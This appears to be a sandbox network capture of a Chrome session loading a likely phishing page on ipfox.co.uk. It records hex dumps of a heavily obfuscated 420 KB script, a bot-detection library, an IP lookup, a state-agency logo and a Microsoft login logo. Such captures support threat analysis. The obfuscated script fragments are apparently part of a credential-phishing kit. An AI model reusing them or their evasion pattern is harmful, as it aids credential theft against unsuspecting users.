                                              2024-10-25 13:45:12 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449750107.178.102.964431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:11 UTC351OUTGET /pages/errorss.js HTTP/1.1
                                              Host: ipfox.co.uk
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC376INHTTP/1.1 200 OK
                                              Connection: close
                                              content-type: text/javascript
                                              last-modified: Fri, 18 Oct 2024 19:36:34 GMT
                                              accept-ranges: bytes
                                              content-length: 420812
                                              date: Fri, 25 Oct 2024 13:45:12 GMT
                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                              2024-10-25 13:45:12 UTC992INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 38 30 38 64 2c 5f 30 78 34 63 30 37 36 33 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 33 39 65 36 61 28 5f 30 78 33 33 63 37 35 64 2c 5f 30 78 32 31 66 62 32 39 2c 5f 30 78 32 31 63 39 33 64 2c 5f 30 78 32 38 36 32 36 64 2c 5f 30 78 33 34 31 30 64 39 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 63 62 36 28 5f 30 78 32 38 36 32 36 64 2d 20 2d 30 78 33 39 34 2c 5f 30 78 33 33 63 37 35 64 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 32 35 38 31 32 32 3d 5f 30 78 34 34 38 30 38 64 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 62 64 64 32 64 28 5f 30 78 35 32 64 36 30 33 2c 5f 30 78 31 63 36 34 61 36 2c 5f 30 78 31 30 39 63 39 66 2c 5f 30 78 31 61 66 37 32 33 2c 5f 30 78 31 33 34 63 36 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 32
                                              Data Ascii: (function(_0x44808d,_0x4c0763){function _0x539e6a(_0x33c75d,_0x21fb29,_0x21c93d,_0x28626d,_0x3410d9){return _0x2cb6(_0x28626d- -0x394,_0x33c75d);}const _0x258122=_0x44808d();function _0x3bdd2d(_0x52d603,_0x1c64a6,_0x109c9f,_0x1af723,_0x134c62){return _0x2
                                              2024-10-25 13:45:12 UTC14994INData Raw: 32 62 2a 2d 30 78 31 36 66 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 62 64 65 36 28 30 78 31 31 33 62 2c 30 78 31 30 34 33 2c 30 78 31 37 37 37 2c 27 6f 78 5e 74 27 2c 30 78 37 38 62 29 29 2f 28 30 78 31 2a 2d 30 78 31 65 34 39 2b 30 78 31 32 31 33 2b 30 78 36 35 2a 30 78 31 66 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 62 64 65 36 28 30 78 34 36 64 2c 30 78 61 63 66 2c 30 78 31 32 61 65 2c 27 51 4b 55 55 27 2c 30 78 35 32 34 29 29 2f 28 30 78 31 35 61 62 2b 2d 30 78 36 62 63 2a 2d 30 78 31 2b 2d 30 78 31 63 36 31 29 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 39 65 33 61 61 28 30 78 64 30 34 2c 27 4e 51 4f 36 27 2c 30 78 33 64 62 2c 30 78 32 36 35 2c 30 78 39 39 65 29 29 2f 28 2d 30 78 31 66 33 37 2b 2d 30 78 32 35 32 31 2b 30 78 34
                                              Data Ascii: 2b*-0x16f)+-parseInt(_0x54bde6(0x113b,0x1043,0x1777,'ox^t',0x78b))/(0x1*-0x1e49+0x1213+0x65*0x1f)+-parseInt(_0x54bde6(0x46d,0xacf,0x12ae,'QKUU',0x524))/(0x15ab+-0x6bc*-0x1+-0x1c61)*(-parseInt(_0x59e3aa(0xd04,'NQO6',0x3db,0x265,0x99e))/(-0x1f37+-0x2521+0x4
                                              2024-10-25 13:45:12 UTC16384INData Raw: 31 2c 5f 30 78 36 34 39 36 33 31 2d 30 78 31 63 65 2c 5f 30 78 37 34 66 61 66 36 2c 5f 30 78 31 38 31 36 31 38 2d 30 78 33 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 66 63 61 65 30 28 5f 30 78 31 37 61 63 61 61 2c 5f 30 78 34 62 66 64 32 63 2c 5f 30 78 35 39 62 38 30 64 2c 5f 30 78 32 34 61 35 64 37 2c 5f 30 78 31 39 62 66 38 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 36 38 66 31 35 28 5f 30 78 32 34 61 35 64 37 2d 20 2d 30 78 64 33 2c 5f 30 78 34 62 66 64 32 63 2d 30 78 65 2c 5f 30 78 35 39 62 38 30 64 2d 30 78 34 63 2c 5f 30 78 31 37 61 63 61 61 2c 5f 30 78 31 39 62 66 38 33 2d 30 78 32 32 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 36 64 66 38 64 5b 4d 61 74 68 5b 5f 30 78 35 33 38 36 65 30 28 27 36 41 43 39 27 2c 30 78 31 35 34 39 2c 30 78 64 64
                                              Data Ascii: 1,_0x649631-0x1ce,_0x74faf6,_0x181618-0x31);}function _0xbfcae0(_0x17acaa,_0x4bfd2c,_0x59b80d,_0x24a5d7,_0x19bf83){return _0x568f15(_0x24a5d7- -0xd3,_0x4bfd2c-0xe,_0x59b80d-0x4c,_0x17acaa,_0x19bf83-0x22);}return _0x46df8d[Math[_0x5386e0('6AC9',0x1549,0xdd
                                              2024-10-25 13:45:12 UTC16384INData Raw: 30 78 34 66 30 37 30 37 2c 5f 30 78 34 34 65 63 63 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 36 38 66 31 35 28 5f 30 78 34 34 65 63 63 31 2d 30 78 31 66 30 2c 5f 30 78 35 32 38 38 32 37 2d 30 78 62 32 2c 5f 30 78 32 31 32 31 32 30 2d 30 78 39 36 2c 5f 30 78 34 64 31 37 31 30 2c 5f 30 78 34 34 65 63 63 31 2d 30 78 63 62 29 3b 7d 74 72 79 7b 69 66 28 5f 30 78 61 66 38 64 64 32 5b 5f 30 78 36 65 35 62 37 66 28 27 40 29 70 78 27 2c 30 78 31 37 37 63 2c 30 78 64 30 39 2c 30 78 36 65 38 2c 30 78 31 30 62 61 29 5d 28 5f 30 78 61 66 38 64 64 32 5b 5f 30 78 36 65 35 62 37 66 28 27 43 28 26 70 27 2c 30 78 64 66 65 2c 30 78 31 31 39 36 2c 30 78 64 32 35 2c 30 78 31 35 66 65 29 5d 2c 5f 30 78 61 66 38 64 64 32 5b 5f 30 78 36 65 35 62 37 66 28 27 43 28 26 70 27 2c 30
                                              Data Ascii: 0x4f0707,_0x44ecc1){return _0x568f15(_0x44ecc1-0x1f0,_0x528827-0xb2,_0x212120-0x96,_0x4d1710,_0x44ecc1-0xcb);}try{if(_0xaf8dd2[_0x6e5b7f('@)px',0x177c,0xd09,0x6e8,0x10ba)](_0xaf8dd2[_0x6e5b7f('C(&p',0xdfe,0x1196,0xd25,0x15fe)],_0xaf8dd2[_0x6e5b7f('C(&p',0
                                              2024-10-25 13:45:12 UTC16384INData Raw: 20 5f 30 78 34 64 66 37 36 62 28 5f 30 78 33 38 39 63 36 31 2c 5f 30 78 35 31 65 61 61 61 2c 5f 30 78 32 32 38 34 62 32 2c 5f 30 78 32 37 35 64 36 65 2c 5f 30 78 37 31 39 65 32 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 63 62 36 28 5f 30 78 37 31 39 65 32 63 2d 30 78 33 30 64 2c 5f 30 78 35 31 65 61 61 61 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 30 61 35 65 5b 5f 30 78 34 64 66 37 36 62 28 30 78 66 35 64 2c 27 6a 37 29 70 27 2c 30 78 61 31 32 2c 30 78 61 61 36 2c 30 78 31 31 61 62 29 5d 28 5f 30 78 34 32 63 39 62 64 2c 5f 30 78 32 61 30 38 37 35 29 3b 7d 2c 27 4f 63 58 6f 62 27 3a 5f 30 78 34 30 61 35 65 5b 5f 30 78 34 35 39 64 66 66 28 30 78 31 62 37 2c 30 78 38 38 31 2c 2d 30 78 36 35 2c 2d 30 78 37 36 37 2c 27 6a 5d 54 49 27 29 5d 2c 27 4a 56 5a 6e 56
                                              Data Ascii: _0x4df76b(_0x389c61,_0x51eaaa,_0x2284b2,_0x275d6e,_0x719e2c){return _0x2cb6(_0x719e2c-0x30d,_0x51eaaa);}return _0x40a5e[_0x4df76b(0xf5d,'j7)p',0xa12,0xaa6,0x11ab)](_0x42c9bd,_0x2a0875);},'OcXob':_0x40a5e[_0x459dff(0x1b7,0x881,-0x65,-0x767,'j]TI')],'JVZnV
                                              2024-10-25 13:45:12 UTC16384INData Raw: 66 62 33 2c 5f 30 78 35 39 31 64 65 37 2c 5f 30 78 32 66 37 31 32 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 32 31 35 37 37 28 5f 30 78 37 36 63 66 62 33 2c 5f 30 78 32 64 37 34 62 38 2d 20 2d 30 78 32 62 31 2c 5f 30 78 37 36 63 66 62 33 2d 30 78 31 39 34 2c 5f 30 78 35 39 31 64 65 37 2d 30 78 34 65 2c 5f 30 78 32 66 37 31 32 66 2d 30 78 32 39 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 66 32 64 65 30 65 3d 7b 27 64 4d 66 66 76 27 3a 5f 30 78 33 33 39 34 65 36 5b 5f 30 78 62 37 64 62 37 35 28 30 78 31 37 32 31 2c 30 78 66 36 31 2c 30 78 31 61 65 36 2c 30 78 31 35 32 35 2c 27 6f 78 5e 74 27 29 5d 2c 27 67 6b 4d 61 65 27 3a 5f 30 78 33 33 39 34 65 36 5b 5f 30 78 62 37 64 62 37 35 28 30 78 31 63 62 2c 30 78 38 32 63 2c 2d 30 78 33 31 66 2c 30 78 35 34 65 2c 27 51 62
                                              Data Ascii: fb3,_0x591de7,_0x2f712f){return _0x521577(_0x76cfb3,_0x2d74b8- -0x2b1,_0x76cfb3-0x194,_0x591de7-0x4e,_0x2f712f-0x29);}const _0xf2de0e={'dMffv':_0x3394e6[_0xb7db75(0x1721,0xf61,0x1ae6,0x1525,'ox^t')],'gkMae':_0x3394e6[_0xb7db75(0x1cb,0x82c,-0x31f,0x54e,'Qb
                                              2024-10-25 13:45:12 UTC16384INData Raw: 30 78 34 35 35 30 35 37 2d 30 78 32 38 63 2c 5f 30 78 32 32 35 38 65 32 2d 30 78 31 33 34 2c 5f 30 78 34 36 64 62 38 35 2d 30 78 31 64 39 2c 5f 30 78 35 33 30 37 37 61 2d 30 78 31 32 31 2c 5f 30 78 32 32 35 38 65 32 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 31 32 63 61 31 28 5f 30 78 34 66 35 35 35 61 2c 5f 30 78 33 36 33 62 32 63 2c 5f 30 78 31 32 31 64 31 66 2c 5f 30 78 33 32 61 31 64 61 2c 5f 30 78 33 32 37 32 65 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 62 66 39 37 34 39 28 5f 30 78 34 66 35 35 35 61 2d 30 78 31 63 63 2c 5f 30 78 34 66 35 35 35 61 2c 5f 30 78 33 36 33 62 32 63 2d 30 78 33 34 62 2c 5f 30 78 33 32 61 31 64 61 2d 30 78 65 35 2c 5f 30 78 33 32 37 32 65 37 2d 30 78 31 38 33 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 39 33 33 30 38
                                              Data Ascii: 0x455057-0x28c,_0x2258e2-0x134,_0x46db85-0x1d9,_0x53077a-0x121,_0x2258e2);}function _0x112ca1(_0x4f555a,_0x363b2c,_0x121d1f,_0x32a1da,_0x3272e7){return _0xbf9749(_0x4f555a-0x1cc,_0x4f555a,_0x363b2c-0x34b,_0x32a1da-0xe5,_0x3272e7-0x183);}function _0x293308
                                              2024-10-25 13:45:12 UTC16384INData Raw: 28 30 78 31 36 33 66 2c 30 78 31 39 31 32 2c 30 78 31 31 63 30 2c 27 51 4b 55 55 27 2c 30 78 66 62 36 29 5d 29 3b 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 5f 30 78 61 63 61 64 61 65 5b 5f 30 78 35 63 33 62 64 63 5b 5f 30 78 35 31 33 63 30 30 28 30 78 34 62 63 2c 30 78 61 63 34 2c 30 78 61 34 62 2c 27 75 49 6e 4c 27 2c 30 78 31 33 66 33 29 5d 28 5f 30 78 34 37 34 63 66 66 5b 5f 30 78 35 31 33 63 30 30 28 30 78 63 30 35 2c 30 78 66 63 32 2c 30 78 62 30 65 2c 27 48 79 33 30 27 2c 30 78 66 31 62 29 5d 28 5f 30 78 35 36 64 33 36 34 5b 5f 30 78 35 31 33 63 30 30 28 30 78 61 33 30 2c 30 78 31 35 33 66 2c 30 78 31 33 65 65 2c 27 6a 5d 54 49 27 2c 30 78 31 62 35 30 29 2b 27 6d 27 5d 28 29 2c 5f 30 78 35 65 64 62 32 32 5b 5f 30 78 62 62 38 30 34 33 28 30 78 39 35 36
                                              Data Ascii: (0x163f,0x1912,0x11c0,'QKUU',0xfb6)]);}else return _0xacadae[_0x5c3bdc[_0x513c00(0x4bc,0xac4,0xa4b,'uInL',0x13f3)](_0x474cff[_0x513c00(0xc05,0xfc2,0xb0e,'Hy30',0xf1b)](_0x56d364[_0x513c00(0xa30,0x153f,0x13ee,'j]TI',0x1b50)+'m'](),_0x5edb22[_0xbb8043(0x956
                                              2024-10-25 13:45:12 UTC16384INData Raw: 21 58 27 2c 30 78 38 30 39 2c 30 78 36 65 33 29 2b 5f 30 78 35 36 38 66 31 35 28 30 78 34 61 37 2c 30 78 38 34 39 2c 2d 30 78 36 38 2c 27 63 61 21 58 27 2c 2d 30 78 34 65 38 29 2b 5f 30 78 31 38 39 31 30 64 28 30 78 35 66 65 2c 30 78 62 62 30 2c 27 36 41 43 39 27 2c 30 78 63 66 66 2c 30 78 61 39 66 29 2b 5f 30 78 34 62 36 38 36 35 28 27 63 61 21 58 27 2c 30 78 31 31 36 38 2c 30 78 38 33 39 2c 30 78 34 35 2c 30 78 31 30 64 38 29 2b 5f 30 78 31 38 39 31 30 64 28 30 78 37 32 33 2c 30 78 37 37 36 2c 27 47 32 53 59 27 2c 30 78 63 62 61 2c 30 78 65 34 38 29 2b 5f 30 78 37 66 30 39 37 34 28 30 78 66 34 39 2c 30 78 62 38 32 2c 30 78 64 34 38 2c 30 78 31 30 36 31 2c 27 72 53 4f 63 27 29 2b 5f 30 78 37 66 30 39 37 34 28 30 78 37 33 34 2c 30 78 31 30 63 38 2c 30 78
                                              Data Ascii: !X',0x809,0x6e3)+_0x568f15(0x4a7,0x849,-0x68,'ca!X',-0x4e8)+_0x18910d(0x5fe,0xbb0,'6AC9',0xcff,0xa9f)+_0x4b6865('ca!X',0x1168,0x839,0x45,0x10d8)+_0x18910d(0x723,0x776,'G2SY',0xcba,0xe48)+_0x7f0974(0xf49,0xb82,0xd48,0x1061,'rSOc')+_0x7f0974(0x734,0x10c8,0x
                                              2024-10-25 13:45:12 UTC398INData Raw: 27 75 49 6e 4c 27 2c 30 78 31 31 30 35 29 2b 5f 30 78 31 63 30 30 34 62 28 30 78 31 61 62 36 2c 30 78 31 63 32 63 2c 30 78 31 35 62 32 2c 27 4e 51 4f 36 27 2c 30 78 31 36 31 64 29 2b 5f 30 78 37 66 30 39 37 34 28 30 78 31 34 31 31 2c 30 78 31 39 65 61 2c 30 78 64 38 66 2c 30 78 31 35 62 35 2c 27 45 67 71 33 27 29 2b 5f 30 78 31 63 30 30 34 62 28 30 78 61 33 65 2c 30 78 35 38 62 2c 30 78 35 33 65 2c 27 45 67 71 33 27 2c 2d 30 78 31 34 66 29 2b 5f 30 78 31 63 30 30 34 62 28 30 78 61 36 63 2c 30 78 39 66 61 2c 30 78 36 38 39 2c 27 69 6e 48 68 27 2c 30 78 62 64 37 29 2b 5f 30 78 34 62 36 38 36 35 28 27 6e 6b 4c 6b 27 2c 30 78 32 34 36 2c 30 78 61 62 66 2c 30 78 31 30 31 65 2c 30 78 32 63 62 29 2b 5f 30 78 34 62 36 38 36 35 28 27 55 59 56 35 27 2c 30 78 37 39
                                              Data Ascii: 'uInL',0x1105)+_0x1c004b(0x1ab6,0x1c2c,0x15b2,'NQO6',0x161d)+_0x7f0974(0x1411,0x19ea,0xd8f,0x15b5,'Egq3')+_0x1c004b(0xa3e,0x58b,0x53e,'Egq3',-0x14f)+_0x1c004b(0xa6c,0x9fa,0x689,'inHh',0xbd7)+_0x4b6865('nkLk',0x246,0xabf,0x101e,0x2cb)+_0x4b6865('UYV5',0x79


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.44975313.32.99.974431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:12 UTC343OUTGET /botd/v1 HTTP/1.1
                                              Host: openfpcdn.io
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC698INHTTP/1.1 200 OK
                                              Content-Type: text/javascript; charset=utf-8
                                              Content-Length: 15196
                                              Connection: close
                                              Server: CloudFront
                                              Access-Control-Allow-Origin: *
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Date: Fri, 25 Oct 2024 13:45:09 GMT
                                              Cache-Control: public, max-age=581292, s-maxage=10733
                                              ETag: "5co2cnhGrt59+8B+iLKwJesMrpA"
                                              Vary: Accept-Encoding
                                              X-Cache: Hit from cloudfront
                                              Via: 1.1 231be1c97cc722fa08b64d21072ebfac.cloudfront.net (CloudFront)
                                              X-Amz-Cf-Pop: FRA60-P3
                                              Alt-Svc: h3=":443"; ma=86400
                                              X-Amz-Cf-Id: 8KGh0uVhHFIb4o8bZHz65XVJaSPzd2LRx-eWAo7bIC6WHk8gnHEpdg==
                                              Age: 1321
                                              2024-10-25 13:45:12 UTC12792INData Raw: 2f 2a 2a 0a 20 2a 20 46 69 6e 67 65 72 70 72 69 6e 74 20 42 6f 74 44 20 76 31 2e 39 2e 31 20 2d 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 69 6e 67 65 72 70 72 69 6e 74 4a 53 2c 20 49 6e 63 2c 20 32 30 32 34 20 28 68 74 74 70 73 3a 2f 2f 66 69 6e 67 65 72 70 72 69 6e 74 2e 63 6f 6d 29 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 29 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d
                                              Data Ascii: /** * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com) * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license. */var e=function(n,t){return e=Object.setPrototypeOf||{__proto__:[]
                                              2024-10-25 13:45:12 UTC2404INData Raw: 6d 22 5d 7d 2c 65 5b 69 2e 43 65 66 5d 3d 7b 77 69 6e 64 6f 77 3a 5b 22 52 75 6e 50 65 72 66 54 65 73 74 22 5d 7d 2c 65 5b 69 2e 43 65 66 53 68 61 72 70 5d 3d 7b 77 69 6e 64 6f 77 3a 5b 22 43 65 66 53 68 61 72 70 22 5d 7d 2c 65 5b 69 2e 43 6f 61 63 68 4a 53 5d 3d 7b 77 69 6e 64 6f 77 3a 5b 22 65 6d 69 74 22 5d 7d 2c 65 5b 69 2e 46 4d 69 6e 65 72 5d 3d 7b 77 69 6e 64 6f 77 3a 5b 22 66 6d 67 65 74 5f 74 61 72 67 65 74 73 22 5d 7d 2c 65 5b 69 2e 47 65 62 5d 3d 7b 77 69 6e 64 6f 77 3a 5b 22 67 65 62 22 5d 7d 2c 65 5b 69 2e 4e 69 67 68 74 6d 61 72 65 4a 53 5d 3d 7b 77 69 6e 64 6f 77 3a 5b 22 5f 5f 6e 69 67 68 74 6d 61 72 65 22 2c 22 6e 69 67 68 74 6d 61 72 65 22 5d 7d 2c 65 5b 69 2e 50 68 61 6e 74 6f 6d 61 73 5d 3d 7b 77 69 6e 64 6f 77 3a 5b 22 5f 5f 70 68 61
                                              Data Ascii: m"]},e[i.Cef]={window:["RunPerfTest"]},e[i.CefSharp]={window:["CefSharp"]},e[i.CoachJS]={window:["emit"]},e[i.FMiner]={window:["fmget_targets"]},e[i.Geb]={window:["geb"]},e[i.NightmareJS]={window:["__nightmare","nightmare"]},e[i.Phantomas]={window:["__pha


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.44975513.32.27.444431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:12 UTC355OUTGET /ag.state.mn.us HTTP/1.1
                                              Host: logo.clearbit.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC555INHTTP/1.1 200 OK
                                              Content-Type: image/png
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              Cache-Control: public, max-age=2592000
                                              Date: Fri, 25 Oct 2024 13:45:10 GMT
                                              x-envoy-response-flags: -
                                              Server: Clearbit
                                              strict-transport-security: max-age=63072000; includeSubDomains; preload
                                              x-content-type-options: nosniff
                                              X-Cache: Hit from cloudfront
                                              Via: 1.1 3d58896f901dbeed449603f5d2b4d9f0.cloudfront.net (CloudFront)
                                              X-Amz-Cf-Pop: FRA56-C2
                                              X-Amz-Cf-Id: zunxOl9A6Wklu7p5BbvLMV67awEeypyV-WZL6we-7fnErFSMaQ6Vhg==
                                              Age: 2
                                              2024-10-25 13:45:12 UTC10037INData Raw: 32 37 32 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 26 f4 49 44 41 54 78 9c ec bd 09 94 65 55 75 37 be f7 3e e7 de fb 86 aa 9e aa ba 7a a6 69 7a a0 41 9a 66 92 29 08 b4 0c 0d 06 41 8c 80 0b a3 98 28 c1 18 13 89 43 e4 9f f1 9f 44 83 31 31 fa c5 98 cf 29 51 1c 3e 67 13 25 1a 45 44 10 51 c6 00 02 d2 84 a1 b1 e7 ea ae ee ae ee 1a de bb f7 9e b3 f7 b7 ce 39 f7 be 7a 4d 37 2d d5 d5 f2 b2 d6 f7 f6 7a ab a8 7a fd de b9 e7 ec 7d ce 1e 7f fb a0 07 ce 78 33 74 a9 73 44 9d 9e c0 ff eb d4 15 40 87 a9 2b 80 0e 53 57 00 1d a6 ae 00 3a 4c 5d 01 74 98 ba 02 e8 30 75 05 d0 61 ea 0a a0 c3 d4 15 40 87 a9 2b 80 0e 53 57 00 1d a6 ae 00 3a 4c 5d 01 74 98 ba 02 e8 30 75 05 d0 61 ea 0a a0 c3 d4 15 40 87 a9 2b
                                              Data Ascii: 272dPNGIHDRL\&IDATxeUu7>zizAf)A(CD11)Q>g%EDQ9zM7-zz}x3tsD@+SW:L]t0ua@+SW:L]t0ua@+
                                              2024-10-25 13:45:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449756104.26.13.2054431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:12 UTC545OUTGET /?format=json HTTP/1.1
                                              Host: api.ipify.org
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Origin: https://ipfox.co.uk
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC249INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:12 GMT
                                              Content-Type: application/json
                                              Content-Length: 23
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8d82a54b9a2328e5-DFW
                                              2024-10-25 13:45:12 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 22 7d
                                              Data Ascii: {"ip":"173.254.250.81"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449754152.199.21.1754431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:12 UTC420OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                              Host: aadcdn.msftauth.net
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC738INHTTP/1.1 200 OK
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Age: 18514136
                                              Cache-Control: public, max-age=31536000
                                              Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                              Content-Type: image/svg+xml
                                              Date: Fri, 25 Oct 2024 13:45:12 GMT
                                              Etag: 0x8D79A1B9F5E121A
                                              Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                              Server: ECAcc (lhc/7936)
                                              Vary: Accept-Encoding
                                              X-Cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 91dbb46b-a01e-00e9-0b81-7e3c42000000
                                              x-ms-version: 2009-09-19
                                              Content-Length: 3651
                                              Connection: close
